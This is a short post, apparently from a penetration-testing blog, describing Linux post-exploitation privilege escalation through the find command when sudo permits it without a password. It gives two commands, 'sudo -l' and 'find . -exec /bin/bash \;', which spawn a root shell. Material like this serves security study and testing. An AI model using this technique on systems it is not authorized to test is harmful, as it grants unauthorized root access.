find – privilege escalation by Vry4n_ | Dec 27, 2019 | Linux Post-Exploitation find Linux command can help us escape from a restricted shell, if you get to run the program with higher privileges, like NOPASWD entry in /etc/sudoers. How to 1. sudo -l 2. find . -exec /bin/bash \;